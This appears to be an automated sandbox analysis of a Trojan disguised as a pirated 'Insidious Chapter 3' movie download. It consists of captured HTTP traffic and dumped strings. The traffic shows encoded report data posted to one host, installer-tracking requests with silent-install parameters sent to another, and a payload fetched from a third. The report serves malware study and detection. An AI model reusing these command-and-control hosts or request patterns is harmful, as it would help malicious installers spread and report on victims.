POST / HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: r1.the-invention.org

Content-Length: 5998

Cache-Control: no-cache

data=4hUxCFbegoHZp34567yEl&report=Ybk79iZRZdw4WMPHwyTBrK6KHsoau9uwVsAOVy/MzQAcIXkQxSglS131JAsyvoEJNT6ZW0YJNPp0DFdPYmkehHyRGNPVt4ZhejkGjVIgHBf25unVVe9Y7O9kxVaW94sj9Y/YFRXES2DGbxEKtENa5KV xVn42Z3ufm0bn6t29AeWjaPYa4Vc MV4sO3TJ/KFZcEmFL5HOQM9SoVeBScasmPsVJftvIRU9l//Tc/ oKrHv6lAQQzKO10K5szW0c5cTObz6GlihFziTSq6Zgh0f8h9Yppf9wp2HXE7EB9zFve38MfuDXR6rhDQO/n1di43TGPWQ4HNFKHxrVMd0MnF/Vdicc24wLcq4ILBiXuO5yij58LxT7RqYKVT5hkEebv5nUd7Lebgo10MKh9/cUnCEFbnHuKVQ0thBl7TEFtbrInAj6 e3Vy6fqFRkVsp8 aKNSZEukqkDiMTW4TFJ1eypYGPLbMk3JVwOfVaeXcYS8HXCET5KeSV8xjpLksaLJyJRcnSiz6wEgCcBP3wdvITes vHhUpCn1r4IkaD5PzyKfanIy6PMFaX1IvVV2DTUd7xsN0ENELfo1XyT2LS4YiV64O1rgthy4cXwE1b6bZuHgyf9 ybjWcBEJJAQbN/UcHNemTyckhBB/0JvmDdqgyQyCQSsi1n4aScyJvjqTkntGVnzu2bHc/ OBM0I90aeaT1FalZKIr9VNaUIsvzmeZLl7iLlt Fz1bF8S4qh9SQaYCCSArBdzW2Fy8q9R/ulTQJX DyQZLOBuLPiZ1BRgZ/IJJPwyyMg28zVxUeslGvwKNkCAW8S51tR1WI75/nz12p6Xwlt8Gfm2V1Y2QyGJ53hM/4wV3NE6Nbyk9hXyR0w8PcVoZw8q5UTqll MORPm42L3oC//TacRF2jF6cSDaU JtSt9lDweTSv8c3YSEcg9SaDx2V 6E2cmQMVqJR7S6Xbx3MPEqT/hFXn5rXCVHY9VwSYPMp6mS6pXk/xNdpMSg5d14xx9IqVSH9N8brrC30q1Ek h12IF8FmIlYa tHCflb2ieTcAuEWvJflXyWOmAjnKVzErTGNydVcFoeyT ytH5ZPmiiVqgam1uRgeieBNeSDVXc/yKT/W 8qvSkvfrCpCkjEoEgSrpqwB2wPrTG77N0pr/sfbjQz/NNKmYUWVFVXZpucETPgjccl65g58y2GjmWjSj4VMfCPpGEAdHjl1CJjlvisyScESGl11ObgnXZw3 CaDeCILByaZRDQpscMWQ0yjf8/C

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:51 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close

{}..

GET /?step_id=7&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:55:13 GMT

Content-Type: text/html

Content-Length: 8398

Connection: close

Content-Disposition: attachment; filename="7.txt"

..r.0.B.Q.b.W.Y.J.U.A.m.z.C.3.x.u.r.p.E.e. .q.P.8.F.S.v.X.y./.W. .1.7.X.o.7.P.O.J.I.T.9.P.s.v.R.M.S.4.n.v.d.m.L.L.2.j.O.5.F.S.G.O.h.e.R.p.6.t.f.t.U./.T.6.P.Y.j.P.U.S.r.p.5.Y.k.B.r.M.l.0.O.y.c.F.R.X.h.g.y.h. .c.P.H.K.w.3.e./.Q.c.b.H.v.d.3.5.k.F.M.G.m.C.j.Z.g.D.X.5.D.B.h. .F.S.V.h.O.p.U.L.I. .5.Z.0.L.O.E. .8.Z.0.1.f.u.m.M.j.a.2.J.Y.4.k.y.d.B./.I.4.v.H.g.6.9.Z.Y.J.a.4.Q.E.8.5.R.D.h.e./.v.b.k.Y.Z.k.R.9.a.a.H.m.E.z.N.R.v.3.E.w.r.H.j.I.z.X.a.G.7.w.9.K.Y./.q.B.r.r.t.r.D.l.5.6.a.h.B.X.I.b.A.i.k.v.3.H.Q.W.J.m.m.l.d.O.u.f.X.r.0.1.Y.1.t.w./.1.x.s.v.S.T.Z.E.G.2.l.n.E.x. .a.V.S.R.9.W.c.q.j.B.x.A.s.x.h.i.9.B.m.N.i.8.Y.I.j.1.D.i.N.I.r.8.L.L.5.o.g.m.k.f.4.M.9.K.I.G.6.k.z.u.u.L.F.G.L.K.5.S.o.7.3.w.6.s.r.M.U.T.h.Z. .G.t.H.Y.W.X.b.G.O.z.M.X.X.J.j.l.q.S.R.T.c.x.N.C.Z.Y.M.W.j.g.n.g.D.1.H.m.o.p.I.q.F.5.4.j.u.7.R. .c.a.W.V.i.y.T.d.U.w.o.a.a.M.1.c.o.C.K.J.3.t.G.2.7.N.w.a.C.k.a.g.9.D.l.G. .c.H.x.x.X.t.Z.e.6.h.V.q.D.2.X.i.C.y.M.G.r.0.z.q./.n.R. .w.l.B.S.t.h.X.q.w.C.t.3.6.V.4.r.C.u.z.l.X.7.r.1.P.r.8.I.H.E.0.s.w.F.z.N.g.3.v.Y.X.Y.Q.q.M.o.Z.I.M.8.E.9.L.C.h.X.M.Z.W.i.Z.g.P.o.z.K.F.P.o.b.t.0.7.1.X.q.J.Q. .a.H.c.l.r.K.0.N.T.s.I.e.E. . .L.3.X.r.J.X.F.j.o.y.W.x.W.c.9.8.f.1.V.7.p.6.7.3. .S.Y.h.q.b.a.G.d.S.4.S.e.Q.V.G.A.z.w.Z.y.x.X.x.c.b.A.r.J.l.L.D.R.e.5.g.f.e.H.a.k.I.K.t.u.e.1.u.m.M.E.l.Z.5. .w.7.H.Z.M.k.o.a.9.p.C.l.7.N.y./.v.t. .I.c. .I.v.m.f.m./.Z.s.g.E.N.P.k.z.O.G.f.l.O.Y.9.H.H.w.7.E.9.4.M.n.V.C.A.T.J.i.k.Y.X.w.9.T.c.x./.m.U.u.h.I.q.L.4.9.f.i.d.k.F.Z.Y.s.4.u.n.f.k.F.M.2.3.W.M.t.8.C.1.M.a.y.9.h.P.4.G.j.k.H.C.n.g.0.n.P.t.A.w.2.q.B.p.L.3.i.6.2.

<<< skipped >>>

GET /2052/TerminusKeeper_143462550383614.ca HTTP/1.1

Accept: */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Pragma: no-cache

Expect: 100-continue

Host: artstickerios.info

Connection: Keep-Alive

<<< skipped >>>

HEAD /2052/TerminusKeeper_143462550383614.ca HTTP/1.1

Accept: */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Pragma: no-cache

Expect: 100-continue

Host: artstickerios.info

Connection: Keep-Alive

HTTP/1.1 100 ContinueHTTP/1.1 200 OK..Server: openresty..Date: Wed, 01 Jul 2015 04:54:03 GMT..Content-Type: application/octet-stream..Content-Length: 3439893..Last-Modified: Thu, 18 Jun 2015 08:40:11 GMT..Connection: close..ETag: "558283eb-347d15"..Accept-Ranges: bytes..

GET /?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:05 GMT

Content-Type: text/html

Content-Length: 8292

Connection: close

Content-Disposition: attachment; filename="4_1.txt"

..O.b.r.3.F.i.k.2.0.T.6.U.L.O.z.0.R.J.Q.D.P.l.8.c.T.j.Q.g.a.I.D.6. .Q.B.X.j.9.b.6.t.B.W.f.D.g.t.3.b.q.J.w.H.g.o.O.a.N.J.O.z.w.p.B.a.r.n.u.Y.W.c.N.n.t.c.W.c.c.o.M.O./.0.I.r.r.1.l.s.V.y.3.Y.l./.8.G.a.O.n./.h.O.e.U.9.9.2.G.B.x.V.9.f.J.s.A.e.F.e.u.W.I.H.u.h.a.a.j.J.6.T.E.f.f.G.m.A.o.j.a.t.6.q.N.T.9.1.R.8.X.y.d.L.K.N.A.k.I.I.T.A.W.W.0.X.i.Y.F.i.A.G.p.f.X.k.R.y.6.N.H.3.t. .J.O.7./.T.d.C.X.K.0.w. .q.H.o.K.h.R.A.m.m.D.t.m.J.N.o.8.K.Y.h.b.K.H.s.K.y.v.n.i.h.O.H.G.K.9.i.e.w.F.S.Z.S.p.h.X.V.T.R.t.T./.x.s.H.v.n.f.x.m.E.X.Q.m.C.W.R.S.b.o.H./.Z.i.b.O.C.w.n.V.D./.I.7.c. .A.L.H.Z.7.S.e.M. .H.P.o.N.D.W.G.F.8.d.v.e.7.v.j.u.X.V.P.x.X.l.W.e.P. .h.X.x.A.V.Y.t.u.W.2.l.F.t.s.V.V.V.6.N.x.5.4.L.G. .k.4.w.M.3.U.I.k.P. . .J.4.d.g.D.8.6.l.z.n.7.A.g.O. .l.D.I.b.B.n.3.V.S.V.l.P.8.W.N.h.c.s.j.k.1.Y.A.8.9.y.V.H.m.g.T.2. .C.O.Z.A.M.I.H.r.a.1.X.P.2.N.f.6.c.l.d.z.1.Z.6.q.a.T.k.A.P.h.x.I.y.A.0.j.S.R.B.N.S.d.I.u.u.h.m.z.x.l.d.T.d.N.0.O.o.y.i.v.W.g.s.p.6.M.4.M.h.R.Y.m.d.S.4.i.K.2.1.o.K.3.q.t. .g.z.b.N.W.8.P.z.l.l.7.6.g.1.X.D.5.p.l.6.s.7.S.x.G.f.s.x.P.p.x.H.1./.B.k.X.H.H.w.m.m.z.T.y.O.0.m.S.a. .Y.z.K.w.Z.9.q.Q.e.u.L.9.H.X.2.x.O./.A.D.g.o.4.o.N.K.1.L.W.u.r.T.W.1.C.x.z.V.O.f.K.c.c.0.H.G.o.V.7.k.P.8.8.I.h.T.c.1.b.S.8.X.C.E.b.1.X.w.K.p.G.b.U.P.o.i.D.b.t.M.s.k.a.j.v.I.h.b.a.E.h.l.n.Z.E.z.V.T.d.A.w.5.6. .5.0.W.o.I.3.L.y.v.N.A.H.O.J.q.J.W.m.f.K.e.A.I.v.k.O.a.P.Q.2.0.Z.S.y.g.B.L.7./.z.9.1.C.O.G.N.w.O.z.J.N.1.E.7.5.g.I.h.I.K.s. .l.e.N.v.c.Z.0.7.a.I.S.X.T.k.v./.q.C.m.p.S.A.9.K./.g.D.v.Y.N./.X.0.x.G.f.4.8.D.e.h.s.u.W.r.c.x.Q.D.y.O.M.p.e.s.g.S.M.l.v.M.L.D.r.V.X.

<<< skipped >>>

POST / HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: r1.the-invention.org

Content-Length: 5922

Cache-Control: no-cache

data=qhcYUBOKdgCLOYSUMOhhU&report=jN8R3Ac9OgScSS1JLF/3jtm7mnRiJUrNKJKIDxUWpfEoUQ4J8kf8cQ7JkXJk5e8Zu7VSXiCoZFu4sczsdTuhwVfBO/ztm2TpmiYcyZdyHB68A6kKbaDTeq7nG3KA1chT8NE59WpFTcW VSWv66cxat2bz4JSTBSKEG1O13Uy3CQjCE4E270cbIYb7wNTEFujhenU5/29f8b5qOQM0iLpWE4ClGC2nT3izFhh Q1ZPVWxpGrk0DqrytN9P36MPdE60qpG2LvwI6Gt8KlUlTU1ZlD k4Iooprj8kBWbF18Hq7h9/iQBqCYSGoT90ZeuOrgBQQRy5zINUonT12IPTlPVj3VEZoOIc23y8iI4p75qqaKJVgw8igKCBhZ3UTcqTDepYb0Prf9rew3gLc0d0IpsAgv4Gzqif52/a0AaSy0t5DIEDnXt1CzVHl6LL7/zGy40xoIfUuIiKnc0x1I8l/WP7YyY3eQUmfSfjLWPF923lKjVy0xHNAyojCOCoZGfvSiYotCeQr5e6KnzmiKyMakKOdunwoFchcFIM23CmM3BngWK4V8 Ch5uOKqzoY6WchJlzxht1dxReAfys3pWas51wVDDQ3vAmettU/q40Ih5A8DkUiM3muL IOIRazpMBMI xNK2h2XEe6m8qi4SuXgi26KRYvg1u7OnHS4dl8k9EmujmAfx3y1cu5WiGRb Mq5EbVdja/qd0alFmAZQ812a02AE7vSptfe1iWyXi xak6FUzGAgdY2WtA84vyrI3GNVpPE28abUGOKzxGZ6bni/iTegMnQF/6aSoUcqw4 R6kIVrN9kOPXk9DNS5s47YnGWXTCKPDHugdfWp31Jsji5vggk3iKNhE6Oo2HxTztFW4vG9COhEYDJEr1PKMnZJtufsT6jnaAZ4fDJLcja04cqSXApCwYmGxUxKjFKOw4aXSekZ1XmL3 0qQPvsh3tc 3piBjm8QXIxlGiwUtk gt8QXaIou0I1JsCi5m/dUG/i6Bx5cexsOe4rcY667KsLRZeraT8jIutxpx42FYJ/U19xaGA/o0vnVnQ1N6gkc1oqXp8qhPlhagmr3WzvnNtV0hgA3SYyDm6HXN/DQ 1MT1VdkXj8cAG6tunRWsrWdif1msUwxhWWzN2SfRDWz7bpZFDkN cEbpch3epFK7wzTyCROAfMPos4EDcJn8e3AZcCYFHxKDEtn veEuFX3k/b1zIJA/iEkz RQg0qXnd7I8wd9dXv5m9J Q1NnUEsLCfrGoHedLGWxPCJAz

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:17 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close

{}..

POST / HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: r1.the-invention.org

Content-Length: 5894

Cache-Control: no-cache

data=tYVyuHeBHFqO123456wKW&report=NoTw8vkdBiAq45rpniL0qPoO2bms2f/VMQsXgjfYWG82WyOr6niAS1/gNW47vU/GIOPGB0YR83uereBsdmkekOKm3j zS4ZaL9Xq Ukc3Flnh9iPw3Hnoc9kxrdamFtlX3t4fZFUaVbSb0vCnrKybw iMSqUP64rIVQsacWFiKmlDlxstGskUKlGr7lD4V1ikB7dXHkt7VJzvVnn9N53TyKKCn1B215SYOp81xkUXyaW7qHn4T61kzTS CaonJXJkaTbNnfuzZ6gX8IEkyzOh7QYwy29ARqQWaJhwuI1B5d1ZgO5pZJJIVP6qHENZqGe4lHxeLX5jnDwuTZpKzs YYl2zGF3h1gn oxWPjDFDskCsc8gFH7IcbkT51WsVFGqAcQe2aL4aL3PFpyTaDpwVjz271G7D8gfU7/LdXej61uQSREccUnXwfN7FFng4fbzPyhaqJKl/ovqs7dgMG03kLdg9W/Dxfwx2RL/DBefA2yAZp0v8rI3RCH8SYNzPg4vnMTf7v ljJR/zra3zkh3PYoVUG1FDXtvyWJePEfqc0R4qhSgMn8fY6IAOSAWvK1vRDnPNkK49rfCHQ1o6UTMH3CcfCoSv1L0ZXRhvRwRTG6L7bIehkJ4OTbrfQS1hTyQbcy400GmhXawJm2Q2ze3eGjPEoEpOBqJfhQsFbEjupeYzZKhH/yhfnd2e1W8J6W9Z5tCzPSjh4Jg6OYD77yoO7U8e8s8U6B5DQ uW5TGRIMeQzvrbjuh7ThvLw465DOPMqwi76soxpkynQHCFbDzvidt5VMjXg5aO4uKqvB jjyQGFGwvGQ0uxXJMY0J8n8 iUhtcsZ0doRpNCz88243Uh/VBYaftroiFza52tLFDBfr54fNkulUDAT4Qe1JXJgWelZD5BhTR7wOp4OHAq5zQWj W/SdLsrTOVP/Ft8fb7mXqIb5TE228DRYJ8DHs3/2RjPNLsNUYD0kmuYiqO G9Im2dRw5yv/1GVll9rm9Xqnh0YeAbBEXF5DcZWxmGOLp3KhlG XxWdqAD8rpYSqudr7tLQBPjlhk7ma6cMNT6waLUO95ieFT7mbu4YWwbOZ2c3NfCe77wyXoG7pkcSvZqJUYZsu4m2NGQE/TUGeVwkNywrVBOSYeujc49eDNjmb63CT8NilJCfy8e6RKVYNtCMFTIha37CvXNvfGp2LmtWSDW49NgxC6fLOcxzHmhfycsmJht7l3c02OB9FImM11lXd1d5pKc6mgAU7IsGG1VTdKxi/RhS8qqlhM

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:59 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close

{}..

GET /?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:04 GMT

Content-Type: text/html

Content-Length: 8316

Connection: close

Content-Disposition: attachment; filename="3.txt"

..i.z.m.f.x.h.Q.L.t.a.C.h.g.q.W.l.h.a.u.g.C.w.7.l.V.z.L.u.e.H.U.m.X./.D.D.k.H.V.0.y.a.Z.p.H.z.c.r.X.I.M.G.r.p.a.v.r.9.f./.H.6.t.C.F.b.d.K.a.K.t.f.3.w.a.E.W.g.1.H.q.F.E.K.H.7.c.n.V.W.O./.o.Y.6.Q.j.K.j.R.n.m.5.U.e.U.k.O.Y.s.k.L.D.7.R.9.c.I.H./.6.x.z.K.Y.6.P.K.Y.U.J.l.l.I.e.M.B.U.W.Z.i.Z.H.8.X.k.0.M.z.y.g.N.v.Z.p.N.E.1.o.C.k.h.9.8.k.F.i.T.k./.Q.e.J.Z.c.c.h.N.G.d.L.K.n.7.A.T.8.n.k.Z.E.C./.g.9.a.v.H.R.B.l.t.R.M.O.s.V.d.C. .G.p.L.w.P.M.u.C.x.Y.W.6.8.T.c.o.m./.r.Y.J.e.X.r.2.3.B.a.4.8.H.n./.F.v.N.H.X.k.x.c.Z.d.W.q.9.F.A.w.w.P.D.A.Y.T.X.d.6.k.8.O.q.5. .O.g.d.M. .s.5.4.g.H.2.R.U.y.j.R.J.w.t.X.b.Q.9./.h.t.5.B.w.8.6.z.V.E.x.4.w.N.l.u.R.O./.p.f.k.k.Q.2.J.A.W.B.D.Z.E.J.R.0.S.G.P.n.L. .a.W.w.q.O.0.w.E.q.v.9./.s.2.f.P.F.B.h.C.e.2.O.U.K.X.W.E.p.I.q.5.h.m.l.3.8.P.9.7.Y.O.w.C.l.e.Z.G.S.Q.n.i.v.l.O.y.0.m.F.Q.d.H.W.I.v.Q.B.V.5.l.5./.J.v.P.C.g.y.u.N.K.p.R.7.D.Y.s.P.C.Q.1.a.u.C.L.n.B.J.T.D.M.d.W.m.Y.H.w.b.T.n.O.d.c.p.B.W.E.o.B.Q.O.A.X.S.P.7.e./.I.K.D.6.O.9.m.p.9.Z.q.S.G.f.p.r.g.K.7.f.s.K.l.O.F.m.Z.u.e. .8. .A.i.2.X.d.2.7.F.h.i.Z.E.f.N. .x.l.W.R.h.J.P.0.P.L.d.E.q.0.P.H.y.C.J.k.r.p.y.g.B.g.0.U.1.4.k.u.M.5.e.g.k.Z.b.0.S.d.W.p.t.U.r.Y.A.8.4.X.2.R.f.O.u.B.u.d.w.6.A.Y.j.n.k.m.y.S.Y.Z.d.3.K.2.M.O.a.k.3.i./.w.q.X.j.M.H.o.X.E.X.J.3.O.o.S.3.j.0.4.D.b.G.s.d.L.K.6.s.Z.j.F.g.X.2./.S.y.C.s.1.L.y.h.b.c.M.N.j.O.o.l.3.B.8.M.0.g.F.R.m.7./.3.c.s.m.Z.1.f.S.P.J.M. .A.z.0. .A.K.4.Z.n.s.I.x.4.9.0.G.y.C.Z.y.S.t.j.y. .9.F. .f.O.k.T.H.B.h.S.5.f.D.d.q.M.O.9.n.O.V.v.T.h.f.q.g.s.V.3.O.c.h.H.g.m.W.h.s.w.w.1.g.7.B.8.2.Q.c.N.y.c.v.4.f.u.L.d.u.i.q.l.U.d.w.N.E.Y.h.A.

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

rundll32.exe_1016:

.text

.text

`.data

`.data

.rsrc

.rsrc

msvcrt.dll

msvcrt.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

GDI32.dll

GDI32.dll

USER32.dll

USER32.dll

IMAGEHLP.dll

IMAGEHLP.dll

rundll32.pdb

rundll32.pdb

.....eZXnnnnnnnnnnnn3

.....eZXnnnnnnnnnnnn3

....eDXnnnnnnnnnnnn3

....eDXnnnnnnnnnnnn3

...eDXnnnnnnnnnnnn,

...eDXnnnnnnnnnnnn,

.eDXnnnnnnnnnnnn,

.eDXnnnnnnnnnnnn,

%Xnnnnnnnnnnnnnnn1

%Xnnnnnnnnnnnnnnn1

O3$dS7"%U9

O3$dS7"%U9

.manifest

.manifest

5.1.2600.5512 (xpsp.080413-2105)

5.1.2600.5512 (xpsp.080413-2105)

RUNDLL.EXE

RUNDLL.EXE

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

YThere is not enough memory to run the file %s.

YThere is not enough memory to run the file %s.

Please close other windows and try again.

Please close other windows and try again.

9The file %s or one of its components could not be opened.

9The file %s or one of its components could not be opened.

0The file %s or one of its components cannot run.

0The file %s or one of its components cannot run.

MThe file %s or one of its components requires a different version of Windows.

MThe file %s or one of its components requires a different version of Windows.

UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"

UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"

Error in %s

Error in %s

Missing entry:%s

Missing entry:%s

Error loading %s

Error loading %s